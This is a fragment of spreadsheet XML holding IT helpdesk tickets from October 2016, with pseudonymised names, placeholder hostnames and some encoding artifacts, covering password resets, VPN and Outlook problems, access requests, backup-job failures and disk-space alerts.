item # 6970497 so# 36119918 line 490. picking request #6671926 delivery# 9169565916
from: kryuisti turleythy 
sent: wednesday, october 12, 2016 10:41 am
to: ebpwcfla qoxvpbam
subject: re: delivery note for bakyhrer huhuyghes
can you give me an order number?
kryuisti turleythy
usa site business manager
hybiaxlk.lawptzir@gmail.com
from: ebpwcfla qoxvpbam 
sent: wednesday, october 12, 2016 8:20 am
to: kryuisti turleythy &lt;hybiaxlk.lawptzir@gmail.com&gt;
subject: delivery note for bakyhrer huhuyghes
hi kryuisti,
                i'm trying to ship out an order for bakyhrer huhuyghes , i have a picking request but i am unable to print out a delivery note.
is there any way you can help me with this kenny does not know.
</t>
  </si>
  <si>
    <t>folder missing</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: munxvfhw.texsbopi@gmail.com
dear sir,
pkj folder is missing in u:guest:  u is HostName_95
prakaythsh kujigalore
senior manager, engineering
munxvfhw.texsbopi@gmail.com&lt;mailto:munxvfhw.texsbopi@gmail.com&gt;
</t>
  </si>
  <si>
    <t>munxvfhw texsbopi</t>
  </si>
  <si>
    <t>windows account frequently getting locked.</t>
  </si>
  <si>
    <t>wyxqkzmf urigtqnp</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_568 failed in job_scheduler at: 10/12/2016 22:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_568 failed in job_scheduler at: 10/12/2016 22:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_770_inc failed in job_scheduler at: 10/12/2016 22:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........          5          _x000D_
  failed disk agents ...........          1          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........          6          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          0          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................   39418 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          1    _x000D_
_x000D_
_x000D_
_x000D_
job bkwin_HostName_770_inc failed in job_scheduler at: 10/12/2016 22:13:00</t>
  </si>
  <si>
    <t>no power on the laptop</t>
  </si>
  <si>
    <t>vgtpkjhn flwsytik</t>
  </si>
  <si>
    <t xml:space="preserve">frequent account lockout on windows </t>
  </si>
  <si>
    <t>HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over 90% space consumed. space available: 3.0 g</t>
  </si>
  <si>
    <t>ticket update on ticket_no0448847</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool not working </t>
  </si>
  <si>
    <t>need help resetting one of my team members hub/windows password.</t>
  </si>
  <si>
    <t>mzyejqvd xzbtcfar</t>
  </si>
  <si>
    <t xml:space="preserve">password reset instruction </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:hello i need to reset one of my team members password. his name is mzyejqvd xzbtcfar, user id gilbrmuyt</t>
  </si>
  <si>
    <t>jdlxkygf wlzqaivr</t>
  </si>
  <si>
    <t>ticket update on ticket_no0448893</t>
  </si>
  <si>
    <t>please give schoegdythu read/write access to all files under  \\HostName_768\globalmfg\amerirtcas manufacturing\infrastructure\</t>
  </si>
  <si>
    <t xml:space="preserve">please give schoegdythu read/write access to all files under  \\HostName_768\globalmfg\amerirtcas manufacturing\infrastructure\
mu # is </t>
  </si>
  <si>
    <t>please give gethyoff schoemerujt (schoegdythu) the same access to server HostName_776 as me (mccoyimgs)</t>
  </si>
  <si>
    <t xml:space="preserve">please give gethyoff schoemerujt (schoegdythu) the same access to server HostName_776 as me (mccoyimgs)
my phone is </t>
  </si>
  <si>
    <t>skype does not work</t>
  </si>
  <si>
    <t>skype will for load. phone . same problem as last week.</t>
  </si>
  <si>
    <t>ticket update on inplant_868930</t>
  </si>
  <si>
    <t>unable to open emails in outlook</t>
  </si>
  <si>
    <t>access to hr_tool denied</t>
  </si>
  <si>
    <t>no access to engineering_tool : see attachment</t>
  </si>
  <si>
    <t>vpn shut down</t>
  </si>
  <si>
    <t>vpn shut down when i was clocking back in for lunch. phone said i had bee gone for 59 minutes. no warning.</t>
  </si>
  <si>
    <t>hdfcwmag plxstkad</t>
  </si>
  <si>
    <t>outlook doesn't start-up on my tablet dell latitude 7350</t>
  </si>
  <si>
    <t>kzbrimwx dconpwbu</t>
  </si>
  <si>
    <t>it notices on the hub do not expire on the scheduled expiry date</t>
  </si>
  <si>
    <t xml:space="preserve">it notices on the hub do not expire on the scheduled expiry date. _x000D_
this notice should have expired on 10-10 but is still actively displayed today: _x000D_
this notice should've expired on 10/7 - _x000D_
_x000D_
please review other notices as well_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>calls are coming to me but rerouting and showing a missed call</t>
  </si>
  <si>
    <t xml:space="preserve">calls are coming to me but rerouting and showing a missed call
telephony_software ext : 
</t>
  </si>
  <si>
    <t>vaniegrz dbocqmpt</t>
  </si>
  <si>
    <t>erp SID_37</t>
  </si>
  <si>
    <t xml:space="preserve">i am able to access SID_34 and SID_39, however i can't access SID_37 for some reason.  i am getting an error that states: account access not within validity date. </t>
  </si>
  <si>
    <t xml:space="preserve"> application erp - mii on node HostName_340 &amp; HostName_339 is down" </t>
  </si>
  <si>
    <t xml:space="preserve">application erp - mii on node HostName_340 &amp; HostName_339 is down" </t>
  </si>
  <si>
    <t xml:space="preserve">ms office : word issue </t>
  </si>
  <si>
    <t>wbtrvdsi gdbuvszx</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: combxind.bvptuqxr@gmail.com_x000D_
_x000D_
good afternoon_x000D_
would you please check this error  in SID_1_x000D_
user revelj_x000D_
erp /SID_1_x000D_
also, i need reset  my password in SID_1?_x000D_
this is the error_x000D_
[cid:image001.png@01d2247c.6249e400]_x000D_
best </t>
  </si>
  <si>
    <t>combxind bvptuqxr</t>
  </si>
  <si>
    <t>zdgnlqkc zfjbpntg</t>
  </si>
  <si>
    <t>unable to access company, password expired</t>
  </si>
  <si>
    <t>uzchtpxo ksvendorjir</t>
  </si>
  <si>
    <t>danyhuie deyhtwet - a plant manager - keeps showing up on hr skype meetings.</t>
  </si>
  <si>
    <t>wifi</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nbdljruw.axcrspyh@gmail.com
hallo zusammen,
es werden bei mir keine wifi verbindungen mehr angezeigt.
zuhause kann ich mich nicht mehr einwÃ¤hlen.
bitte um hilfe.
danke!
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>nbdljruw axcrspyh</t>
  </si>
  <si>
    <t>client's pc is rebooting randomly and also having office software issues</t>
  </si>
  <si>
    <t>unable to see my previous pay slips</t>
  </si>
  <si>
    <t>fjciqgav ybkqvazh</t>
  </si>
  <si>
    <t>wifi not working in pennsylvania (wireless issue at waynesboro)</t>
  </si>
  <si>
    <t>wifi not working in pennsylvania_x000D_
_x000D_
access point not working . work stoppage issue._x000D_
tried calling christgry twice ..reached warehouse_tool mail. left brief message._x000D_
dialed again. not able to reach christgry .</t>
  </si>
  <si>
    <t>i was fixing an order. i went to answer a question on skype. i noticed that skype lost connection. then i noticed the vpn was shutting down. i didn't see a pop up note on vpn before the shut down.</t>
  </si>
  <si>
    <t>vpn connectivity issues</t>
  </si>
  <si>
    <t xml:space="preserve">knocked off vpn connection again.  i wasn't doing anything in particular.  just finished a call.  </t>
  </si>
  <si>
    <t>ultramdntyet wrongful inwarehouse_tool, so# 24897522</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vflagort.xyotrhlf@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
i just sent a request but found more data. so i received the attached email asking to look into the issue. when i look at the inwarehouse_tool (0159274337) referenced in the email, i saw the sample line was charged at cost when it shouldn't have been. when i go into the order, step on the sample line, go to document flow, i see a completely different inwarehouse_tool number than what is referenced. the inwarehouse_tool highlight below is for no cost, as it should be._x000D_
[cid:image001.png@01d22471.b60d3930]_x000D_
_x000D_
when i look at the document flow for the entire order, i see both inwarehouse_tools._x000D_
[cid:image002.png@01d22472.10904e10]_x000D_
_x000D_
please help me understand why the customer was inwarehouse_toold twice for the sample, and why the second inwarehouse_tool is at cost when it should not be. let me know what i need to do on my end to help with this, please._x000D_
_x000D_
for record, the inwarehouse_tool sent on 9/19 is correct._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>lhyrskmn zbovukqm</t>
  </si>
  <si>
    <t>wrongful inwarehouse_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vflagort.xyotrhlf@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
our customer, ultramdntyet, was inwarehouse_toold for a sample line that was entered as a no charge sample in erp. i will be issuing a credit to the customer for the amount charged, but can you tell me why it was inwarehouse_toold to begin with?_x000D_
_x000D_
[cid:image001.png@01d2246f.b6969f60]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>while searching for quotes in erp, vpn shut down. i didn't see a pop up note. the first clue with problem was that erp shut down, then i saw that vpn connection had shut down.</t>
  </si>
  <si>
    <t>unable to connect to companysecure</t>
  </si>
  <si>
    <t>unable to connect to companyssecure</t>
  </si>
  <si>
    <t>mwahtgup wfgesvxd</t>
  </si>
  <si>
    <t>vip zip file</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jwhmqnye.xlpvdwre@gmail.com
i have a large zip file that i want to download and add to a folder on HostName_771 (intellectual property).  when i unzip the file and try to save to HostName_771 it says that there is not enough space.
lryturhyyth ryhunan
chief counsel for IP
jwhmqnye.xlpvdwre@gmail.com&lt;mailto:jwhmqnye.xlpvdwre@gmail.com&gt;
</t>
  </si>
  <si>
    <t>need to find old emails on outlook.</t>
  </si>
  <si>
    <t>epqyourg rxjipfum</t>
  </si>
  <si>
    <t>ticket update on ticket_no0444091</t>
  </si>
  <si>
    <t xml:space="preserve">nachdem ich outlook geÃ¶ffnet habe und eine e-mail angeklickt habe kommt ein blauer kreis der sich dreht und ich nichts </t>
  </si>
  <si>
    <t xml:space="preserve">mehr machen. bitte dringend um hilfe. meine mobile tel. nr. </t>
  </si>
  <si>
    <t>byltiakh vinqkxzm</t>
  </si>
  <si>
    <t>benefits app on ssp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fpbmtxei.jtqbcnfs@gmail.com_x000D_
_x000D_
i do not have the benefits solver application on my single sign on portal. can someone please assist me with getting this added? </t>
  </si>
  <si>
    <t>fpbmtxei jtqbcnfs</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not working : crm issue </t>
  </si>
  <si>
    <t xml:space="preserve">outlook not working, emails not opening : crm issue </t>
  </si>
  <si>
    <t>vjwdyanl knfsjdgz</t>
  </si>
  <si>
    <t>locked out of his system</t>
  </si>
  <si>
    <t>jbyxkpof xetsjfgd</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 password reset </t>
  </si>
  <si>
    <t>expmsvyc thsruydf</t>
  </si>
  <si>
    <t xml:space="preserve">tmunkaiv ockthiyj </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nlgkmpaq.outrnkca@gmail.com_x000D_
_x000D_
all,_x000D_
_x000D_
_x000D_
_x000D_
i need to get a log in created for our new sr. production specialist tmunkaiv ockthiyj._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nlgkmpaq outrnkca</t>
  </si>
  <si>
    <t>erp password reset SID_34</t>
  </si>
  <si>
    <t>efmzltnx uehqbaxo</t>
  </si>
  <si>
    <t>dw06 print job error</t>
  </si>
  <si>
    <t>vwpxjtof vmidzswj</t>
  </si>
  <si>
    <t>druker</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xahuklgm.dqvkfjlb@gmail.com_x000D_
_x000D_
drucker  defekt_x000D_
_x000D_
_x000D_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
[#+company/posts&gt;  [_x000D_
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>xahuklgm dqvkfjlb</t>
  </si>
  <si>
    <t>unable to login to impact award</t>
  </si>
  <si>
    <t>unable to login to impact award_x000D_
tried password reset but was not able to remember security question</t>
  </si>
  <si>
    <t>cizplrvw ymxgteir</t>
  </si>
  <si>
    <t>need link to access outlook web mail</t>
  </si>
  <si>
    <t xml:space="preserve">account locked out </t>
  </si>
  <si>
    <t>oiudarbk ezhnjwdt</t>
  </si>
  <si>
    <t>performance problems in different applications / programdntyms</t>
  </si>
  <si>
    <t>performance problems with erp, ieas and EU_tool._x000D_
especially several timeout errors in EU_tool in the search functions. (see attachment) over the complete day.</t>
  </si>
  <si>
    <t>umykjweg jpwrfuhk</t>
  </si>
  <si>
    <t>downloading or copying collaboration_platform files to purchasing</t>
  </si>
  <si>
    <t>i want to upload directly to purchasing pdf files that are saved in a collaboration_platform file.  can this be done?  was told to open ticket and have assigned to collaboration development group. xszoedmc.gmhkdsnw@gmail.com  or skype.</t>
  </si>
  <si>
    <t>cannot print to cl92</t>
  </si>
  <si>
    <t>ever since a recent workstation move, i am unable to print to cl92.  before the move, i printed to cl92 regularly.  since the move, any attempt to print to cl92 prompts me to install the driver. which i do, but the print job fails regardless.</t>
  </si>
  <si>
    <t>irpvzhym kayqlbuh</t>
  </si>
  <si>
    <t>receiving product in logical warehouse (plant_100) batch is required</t>
  </si>
  <si>
    <t>when using migo/goods receipt to receive product into plant_100 batch information is required  to process.  it has begun to happen more frequently over the past month.  the following rqfhiong zkwfqagbs are examples as to where this has occurred.  mm 4977683, 4978280, 4977686 and 2286073.</t>
  </si>
  <si>
    <t>GRP_54</t>
  </si>
  <si>
    <t>need to setup a aolhgbps pbxqtcek in SID_21 and SID_1 and in active directory</t>
  </si>
  <si>
    <t>need to create the  aolhgbps pbxqtcek in active directory and assign groups miioperatordev and miioperatorqa. let barrtyh know when the aolhgbps pbxqtcek is ready.</t>
  </si>
  <si>
    <t>jypowefv yzgsldrx</t>
  </si>
  <si>
    <t>HostName_170: volume: /dev/SID_3ora on server: HostName_170 is over 98% space consumed. space available: 490 m</t>
  </si>
  <si>
    <t xml:space="preserve">calendar is not visible by manager </t>
  </si>
  <si>
    <t>pnhlrfao ivjxlyfz</t>
  </si>
  <si>
    <t>probleme mit EU_tool \fehler beim auftrag abmelden \ypladjeu wzfryxav</t>
  </si>
  <si>
    <t>ypladjeu wzfryxav</t>
  </si>
  <si>
    <t>basis on-call / shift details...</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mnxbeuso.rfmdlwuo@gmail.com_x000D_
_x000D_
dac / gso â€“_x000D_
_x000D_
basis on-call details has been modified and the modified is placed in the below location in the collaboration_platform. please update your records accordingly._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mnxbeuso rfmdlwuo</t>
  </si>
  <si>
    <t>is the finance_app system still down we need this system to retrieve financial information for our quarterly closing</t>
  </si>
  <si>
    <t>is the finance_app system still down_x000D_
we need this system to retrieve financial information for our quarterly closing</t>
  </si>
  <si>
    <t>GRP_55</t>
  </si>
  <si>
    <t>laptop byclpwmv esafrtbh defekt</t>
  </si>
  <si>
    <t>mr. guruythupyhtyad is still not able to open the folder ie., m:\mtb project mgmt\servicing</t>
  </si>
  <si>
    <t xml:space="preserve">from: jayatramdntydba cvyg 
sent: wednesday, october 12, 2016 2:09 pm
to: nwfodmhc exurcwkm
cc: bhayhtrathramdnty mamilujli; amihtar lalthy
subject: fw: ticket_no1557371:new non-employee :gurublxkizmh nvodbrfluppasadabasavaraj:vvkuthyrppg
hello,
mr. guruythupyhtyad is still not able to open the folder ie., m:\mtb project mgmt\servicing.  please look into this subject and provide access.
best </t>
  </si>
  <si>
    <t>uaeqlxro rzsdalyc</t>
  </si>
  <si>
    <t>deployment notification - ms .net framdntyework 4.6.1 &amp; business_client 5.0 SID_792 - emea -  issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qaohugxw.kdeqjncw@gmail.com_x000D_
_x000D_
i got an error message after 2 minutes_x000D_
i think that update has not been done correctly ._x000D_
could you please check my computer._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>qaohugxw kdeqjncw</t>
  </si>
  <si>
    <t>druckerprobleme mit em021 in germany</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mobaidfx.gviwlsrm@gmail.com_x000D_
_x000D_
hallo zusammen,_x000D_
_x000D_
der drucker em021 druckt nicht mehr Ã¼ber die eingabe â€žbriefkopf"._x000D_
bitte einstellungen korrigieren._x000D_
_x000D_
danke vorab._x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>mobaidfx gviwlsrm</t>
  </si>
  <si>
    <t>need help</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: axcbfuqo.yiagubvh@gmail.com_x000D_
_x000D_
good morning,_x000D_
i am in trouble with my password._x000D_
i changed the password and i have the possibility to be connected to my e-mail and connection to various areas._x000D_
but i still have my old password to start my computer._x000D_
if i request to change my password using ctrl alt delete and change the password, it is not working._x000D_
can you help, </t>
  </si>
  <si>
    <t>software "babiluntr" does not work</t>
  </si>
  <si>
    <t>mopuczxh mflsykip</t>
  </si>
  <si>
    <t>display link not working</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pxbqkfgm.qexvrmcn@gmail.com
hello,
my laptop's display link is not working. pls. help.
message comes as "could not recognize usb device."
vivthyek byuihand
asst manager- sales
company india ltd, india.
[cid:image009.jpg@01SID_35d8e.07ce5550]
</t>
  </si>
  <si>
    <t>need display link adaptor and simcard holder</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zdgxtfqs.tibmhxcs@gmail.com_x000D_
_x000D_
hello,_x000D_
please note that my display link adaptor is not working, kindly arrange a replacement._x000D_
_x000D_
also i need new data card sim-card holder for my laptop._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>zdgxtfqs tibmhxcs</t>
  </si>
  <si>
    <t>copy of desktop files</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: hjcpyxtq.okycpbsz@gmail.com
kindly copy the desktop files of prithivrtyaj (user id:  vvyhtyumasp) to guruythupyhtyad (vvkuthyrppg) local folder.
pc no : awyw8911888
</t>
  </si>
  <si>
    <t>hjcpyxtq okycpbsz</t>
  </si>
  <si>
    <t>telephony_software via remote number</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gmwdvrou.aupnvems@gmail.com
hello team,
iÂ´ve got a problem â€“ i canÂ´t call while working remote 
can you help?
</t>
  </si>
  <si>
    <t>outlook repeatedly asking for passwords</t>
  </si>
  <si>
    <t>bhkgxaty ovmkntah</t>
  </si>
  <si>
    <t>probleme mit EU_tool \tmqfjard qzhgdoua</t>
  </si>
  <si>
    <t>bitte einen ordner im teams laufwerk fÃ¼rth anlegen</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: osjqfbvw.hlmgrfpx@gmail.com
wÃ¼rden sie bitte einen ordner im teams laufwerk fÃ¼rth anlegen.
name:                  hr-tr
voller zugriff:     rtnzvplq erhmuncq
                              rtgdcoun pngufmvq
                              naruedlk mpvhakdq
                              efodqiuh tpfnzkli
                              rcwpvkyb exgjscql
                              gabryltke schÃ¼tt
vielen dank.
gabryltke schÃ¼tt
human resources
osjqfbvw.hlmgrfpx@gmail.com&lt;mailto:osjqfbvw.hlmgrfpx@gmail.com&gt;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</si>
  <si>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 xml:space="preserve">job dir failed in job_scheduler at: 10/12/2016 06:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job dir failed in job_scheduler at: 10/12/2016 06:04:00</t>
  </si>
  <si>
    <t>request lauacyltoe hxgaycze version outlook update.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: luxdnsvk.qmnyzcfs@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
my laptop currently has 2010 version of microsoft outlook._x000D_
kindly help me in getting the lauacyltoe hxgaycze version of the same._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>luxdnsvk qmnyzcfs</t>
  </si>
  <si>
    <t>latitude tab 7350 not detecting the telecom_vendor_3 broadband sim</t>
  </si>
  <si>
    <t xml:space="preserve">latitude tab 7350 not detecting the telecom_vendor_3 broadband sim
phone: </t>
  </si>
  <si>
    <t>neoarmgd meodvbxu</t>
  </si>
  <si>
    <t xml:space="preserve">owner of the group "k-bhty-plc4-yhhm-er" is not available and has gave approval </t>
  </si>
  <si>
    <t xml:space="preserve">owner of the group "k-bhty-plc4-yhhm-er" is not available and has gave approval to add ploxzuts utvimnwo &lt;ploxzuts.utvimnwo@gmail.com&gt;  attaching the approval mail
from: thvnfs anyhusppa 
sent: wednesday, october 12, 2016 3:19 pm
to: gzjtweph mnslwfqv
subject: fw: inc1558231 : add my name to distribution lists
fyiâ€¦
with best </t>
  </si>
  <si>
    <t>tcbonyes gpfacron</t>
  </si>
  <si>
    <t>gso hotline not working</t>
  </si>
  <si>
    <t>gso hotline not working. new as well old numbers tried, user are getting welcome message after that it is blank nothing can be heard.</t>
  </si>
  <si>
    <t>reset the password for wcrbmgon kcudbnrw on e-mail</t>
  </si>
  <si>
    <t>wcrbmgon kcudbnrw</t>
  </si>
  <si>
    <t>maschinen pc r239 ohne funktion -&gt; bitte prÃ¼fen</t>
  </si>
  <si>
    <t>ljxzyriq zqxkrcev</t>
  </si>
  <si>
    <t>faxen von purchase orders direkt aus der po schlÃ¤gt seit gestern fÃ¼r alle fehl.</t>
  </si>
  <si>
    <t>faxen von purchase orders direkt aus der po schlÃ¤gt seit gestern fÃ¼r alle fehl._x000D_
faxing from the purchase orders directly from the po has been unsuccessful since yesterday.</t>
  </si>
  <si>
    <t>rnajgdmb fioznltc</t>
  </si>
  <si>
    <t>rechner fÃ¼r erodiermaschine defekt \youfzmgp xvysrnmb</t>
  </si>
  <si>
    <t>reset the password for xbsckemt durnfyxb on sonstiges</t>
  </si>
  <si>
    <t>hallo,_x000D_
bitte nur das passwort fÃ¼r "appricatehub.com" (impact award) zurÃ¼cksetzen, da auch die sicherheitsfrage: "wie hieÃŸ die erste schule, die sie besucht haben?" nicht korrekt beantwortet werden kann._x000D_
danke.</t>
  </si>
  <si>
    <t>xbsckemt durnfyxb</t>
  </si>
  <si>
    <t>new customer:81055992 has some problme</t>
  </si>
  <si>
    <t xml:space="preserve">i have created new customer account 81055992 in 1333, but it has a problem, it showns "customer 81055992 is markhtyed for deletion in the sales area selected". please help handle it, </t>
  </si>
  <si>
    <t>pvfclkmn gebyipwr</t>
  </si>
  <si>
    <t>in outlook ,i am not getting pauhtul.phillyhuip@company.com mails</t>
  </si>
  <si>
    <t xml:space="preserve">in outlook ,i am not getting pauhtul.phillyhuip@company.com mails
____________________
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
govind
 hello 
ic
 website visitor has joined the conversation
dwfiykeo argtxmvcumar3
 hello
 Â Â Â ,Â Â Â please click on the link, run it twice. give me the id &amp; password.
govind23
 few days back i created folder for pollaurid messages
dwfiykeo argtxmvcumar3
 ok
 please provide me access to your system
govind23
 its not working to me. can you send me teamviewer
dwfiykeo argtxmvcumar3
 please try this link
govind23
 376 775 252 (tinyurl)
 8054(tinyurl)
</t>
  </si>
  <si>
    <t>archiving_tool viewer</t>
  </si>
  <si>
    <t xml:space="preserve">archiving_tool 10.0 has been installed on my pc but i can't view attachments in erp._x000D_
could you please help me ?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>dnqavlem ndymoifb</t>
  </si>
  <si>
    <t>unable to submit lean tracker</t>
  </si>
  <si>
    <t>qnazgxml lbmukxey</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_459 failed in job_scheduler at: 10/12/2016 04:44:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_459 failed in job_scheduler at: 10/12/2016 04:44:00</t>
  </si>
  <si>
    <t>maus defekt \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>probleme mit ws cad \wsboedtj yvlswgxb</t>
  </si>
  <si>
    <t>wsboedtj yvlswgxb</t>
  </si>
  <si>
    <t>engineering tool - urgent customer drawing change - replace of file not possible !!!!</t>
  </si>
  <si>
    <t xml:space="preserve">1.)     briefly describe what you were trying to do and the issue you have encountered._x000D_
it is not possible to "replace the original file" as the following error messages occurs._x000D_
please refer to the attached picture:_x000D_
2.) please include a screenshot of any error messages_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>gdxujefz egnwtvch</t>
  </si>
  <si>
    <t>outlook on laptop won't startup anymore. errormessage</t>
  </si>
  <si>
    <t>name:tuzkadxv rxloutpn
language:
browser:microsoft internet explorer
email:tuzkadxv.rxloutpn@gmail.com
customer number:
telephone:
summary:outlook on laptop won't startup anymore. errormessage
"a new guard page for the stack cannot be created</t>
  </si>
  <si>
    <t>tuzkadxv rxloutpn</t>
  </si>
  <si>
    <t>unable to create sto_mm 7340903 and mm 6239893</t>
  </si>
  <si>
    <t xml:space="preserve">we're unable to create sto for mm# 7340903 per pr# 4121896402/00001 and mm# 7340904 per purrqs 4121803106/00001 , found the error message as per attached    please help fixing this error and advise back to us aerp. </t>
  </si>
  <si>
    <t>probleme mit skype</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fmhlugqk.dpraethi@gmail.com_x000D_
_x000D_
hallo liebe kollegen/kolleginnen,_x000D_
_x000D_
ich kann skype nicht starten. kommt immer diese fehlermeldung:_x000D_
[cid:image001.png@01d22469.6086f8f0]_x000D_
_x000D_
Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>fmhlugqk dpraethi</t>
  </si>
  <si>
    <t>accound locked in ad</t>
  </si>
  <si>
    <t>error login on to the SID_34 system._x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-user has tried the password_management_tool pwd manager._x000D_
-unlocked  the erp id._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ypcudwsf phvatzje</t>
  </si>
  <si>
    <t>sales record</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rdfjsawg.zpmxgdcw@gmail.com
from: amy li
sent: tuesday, october 11, 2016 8:08 pm
to: pradyhtueep yyufs &lt;rdfjsawg.zpmxgdcw@gmail.com&gt;
cc: mthyn xiyhtu&lt;blmvcuya.heklonfc@gmail.com&gt;; jtyhnifer luntu&lt;urfdkvei.bfiulzto@gmail.com&gt;; ayhtrvin yzhao &lt;oqmiabtv.spridlbm@gmail.com&gt;; crysyhtal xithya &lt;smktofel.etsoirbw@gmail.com&gt;; mathgie ztyhng &lt;ryajizsq.roezpsav@gmail.com&gt;; alvrhn twhyang &lt;evlburfd.xbusnyam@gmail.com&gt;; xamtgvnw usdekfzq &lt;xamtgvnw.usdekfzq@gmail.com&gt;
subject: re: sales record
prathryep,
we want to understand why the cost is high for mm7201504 in 5319, plant_283, we select one example.
mm 7201504
this mm is manufactured in plant_304, ship to plant_283.
sales order 35729979/30
relevant dn 9169339940 and  9169306146
intercompany billing 0159162480
billing in plant_283 0159163814
shipment cost in plant_304 rmb892.17( we didn't understand why the cost in plant_304 is so high),it is delivery on sep 25 in plant_304
sales cost in plant_283 is rmb892.12 (this is from margin report in 5319 plant_283, why it is so high?)
std cost in plant_304 is rmb624,15
cost in plant_304 is rmb772.19 based on lot size 80( the qty. is same as sales order)
</t>
  </si>
  <si>
    <t>5323 - credit limit revision for company tooling and company distributors</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rdfjsawg.zpmxgdcw@gmail.com_x000D_
_x000D_
from: yhmwxsqj ugnthxky_x000D_
sent: wednesday, october 12, 2016 11:37 am_x000D_
to: pradyhtueep yyufs &lt;rdfjsawg.zpmxgdcw@gmail.com&gt;_x000D_
subject: fw: credit limit revision_x000D_
_x000D_
pradtheyp,_x000D_
_x000D_
please look into the revision request of company tooling and company credit limit of distributors._x000D_
_x000D_
this is one of the ia point and schedule closure was 30th sep'16._x000D_
_x000D_
need your support to complete this activity so that we can respond to ia team for closure of this point._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>account is getting locked daily</t>
  </si>
  <si>
    <t>wqybuifo qlwfajcb</t>
  </si>
  <si>
    <t>unlock my erp account</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jqpvitdw.vitsrceq@gmail.com_x000D_
_x000D_
hello_x000D_
could you please help to unlock my erp SID_34 account_x000D_
my user id is lilp_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jqpvitdw vitsrceq</t>
  </si>
  <si>
    <t>engineering tool / kpm project numbers not in the right order!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ucphibmr.dfvkbtsj@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
about the engineering tool:_x000D_
the kpm project numbers are numerirtcal not in the right order anymore!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ucphibmr dfvkbtsj</t>
  </si>
  <si>
    <t>lan connection in training room 3 not workig - also need mini-dp to vga adapter</t>
  </si>
  <si>
    <t>jemfbnyk uicenhfp</t>
  </si>
  <si>
    <t>HostName_97: disk space on e:\ label:dat1-HostName_97 is 99% consumed available space is 4.6gb out of 625gb</t>
  </si>
  <si>
    <t>solid works issue: when trying to give print , solid work crashes.</t>
  </si>
  <si>
    <t>solid works issue: when trying to give print , solid work crashes._x000D_
